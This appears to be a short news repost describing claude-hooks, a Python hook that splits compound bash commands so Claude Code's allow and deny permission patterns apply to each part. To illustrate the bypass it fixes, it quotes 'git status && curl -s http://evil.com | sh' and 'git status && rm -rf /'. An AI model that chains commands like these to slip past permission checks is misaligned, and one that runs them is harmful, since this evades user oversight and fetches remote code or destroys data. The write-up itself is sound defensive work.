Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass

Security Gap in Claude Code's Permission System
Claude Code's permission system has a vulnerability where compound bash commands can bypass allow/deny patterns. When you allow a command like Bash(git status:*), Claude Code matches the entire command string against that pattern. This means a compound command like git status && curl -s http://evil.com | sh would match git status* and get auto-approved, even though it chains in curl and sh commands.
The Solution: claude-hooks
The fix is a single Python script called claude-hooks that runs as a PreToolUse hook. It performs several key functions:
- Decomposes compound commands by splitting on
&&,||,;,|, newlines, and extracts$()and backtick subshell contents recursively - Normalizes each sub-command by stripping env var prefixes, I/O redirections, heredoc bodies, and shell keywords
- Checks each sub-command individually against your existing
permissions.allowandpermissions.denypatterns - Deny wins — if any sub-command matches a deny pattern, the whole command is denied
- All must allow — auto-approve only happens when every sub-command matches an allow pattern
- Falls through gracefully — if any sub-command is unknown, you still get the normal permission prompt
Setup Instructions
Installation takes about 30 seconds:
curl -fsSL -o ~/.claude/hooks/smart_approve.py \
https://raw.githubusercontent.com/liberzon/claude-hooks/main/smart_approve.pyAdd to ~/.claude/settings.json:
{
"hooks": {
"PreToolUse": [
{
"matcher": "Bash",
"hooks": [
{
"type": "command",
"command": "python3 ~/.claude/hooks/smart_approve.py"
}
]
}
]
}
}The tool has no dependencies beyond Python 3 and requires zero configuration — it reads your existing permission patterns.
Example Behavior
git status: Allowed both with and without hookgit add . && git commit -m "msg": Allowed both with and without hook (both matchgit *)git status && rm -rf /: Allowed without hook, prompt shown with hook (rm -rf /has no allow)`npm test | tee output.log`: AllowedFOO=bar git push: Might not match without hook, allowed with hook (env var stripped)
The repository is available at https://github.com/liberzon/claude-hooks under MIT license.
📖 Read the full source: r/ClaudeAI
👀 See Also

Microsoft Hacked: Malware Planted in GitHub Repos Targets Claude and Gemini Users
Microsoft shut down 70+ GitHub repositories after hackers planted credential-stealing malware targeting AI coding agents like Claude Code and Gemini CLI.

OpenClaw security risks: autonomous actions and permission concerns
OpenClaw acts autonomously on email, calendar, messaging, and files without waiting for user confirmation, with documented cases of data exfiltration, prompt injection, and ignored stop commands.

Anthropic reveals industrial-scale Claude AI data extraction by Chinese labs
Anthropic confirmed Chinese AI labs used over 24,000 fraudulent accounts to scrape 16 million exchanges from Claude, extracting safety guardrails and logic structures for military and surveillance systems.

Free Claude Skill Scans Other Skills for Security Risks
A developer has built a free Claude skill that reviews the security of other Claude skills by checking code for potentially malicious behavior and analyzing repositories with a scorecard-style approach. The tool helps answer whether a Claude skill appears reasonably safe to use.